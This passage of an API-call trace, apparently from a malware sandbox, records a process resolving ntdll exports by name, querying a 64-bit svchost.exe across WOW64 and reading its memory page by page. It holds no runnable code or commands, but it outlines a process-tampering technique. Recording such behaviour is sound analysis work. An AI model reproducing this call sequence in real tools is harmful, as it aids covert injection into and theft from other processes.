(lpString1="DbgUiConnectToDbg", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiContinue", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="LdrGetProcedureAddress") returned -1 [0077.751] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventRegister", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWrite", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteString", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwReplyNotification", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwSendNotification", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwSetMark", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwTraceMessage", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0077.752] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrAccessResource", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrAddRefDll", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrEnumResources", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrFindResource_U", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetDllPath", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetFailureData", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="LdrGetProcedureAddress") returned -1 [0077.753] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="LdrGetProcedureAddress") returned 0 [0077.753] VirtualFree (lpAddress=0x26c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.760] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0077.760] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0077.760] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df4f4, ProcessInformationLength=0x30, ReturnLength=0x5df548 | out: ProcessInformation64=0x5df4f4, ReturnLength=0x5df548) returned 0x0 [0077.761] VirtualAlloc (lpAddress=0x0, dwSize=0x6c4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0077.761] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0077.761] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0077.761] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1dc, ProcessInformationClass=0x0, ProcessInformation64=0x5df4f4, ProcessInformationLength=0x30, ReturnLength=0x5df548 | out: ProcessInformation64=0x5df4f4, ReturnLength=0x5df548) returned 0x0 [0077.762] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0077.762] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0077.762] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0077.762] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0077.762] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0077.762] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0077.762] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0077.762] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0077.762] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0077.762] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0077.762] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.762] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x26c0000 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x26c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x26c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x26c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x26c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x26c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x26c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x26c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x26c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x26c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x26c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x26ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x26cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38c000, Buffer=0x7ff8, BufferSize=0x26cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.764] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x26cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x26ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x26cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x26d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x26d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x26d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x26d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x26d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x26d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x26d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x26d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x26d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x26d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x26da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x26db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.766] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x26dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x26dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x26de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x26df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x26e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x26e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x26e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x26e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.767] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x26e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x26e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x26e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x26e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x26e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x26e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x26ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.768] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x26eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x26ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x26ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x26ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x26ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x26f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x26f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x26f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.769] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x26f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x26f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x26f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x26f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x26f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x26f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x26f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.770] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x26fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x26fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x26fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x26fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x26fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x26ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x2700000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.771] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x2701000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x2702000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0077.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0xee3c3000, Buffer=0x7ff8, 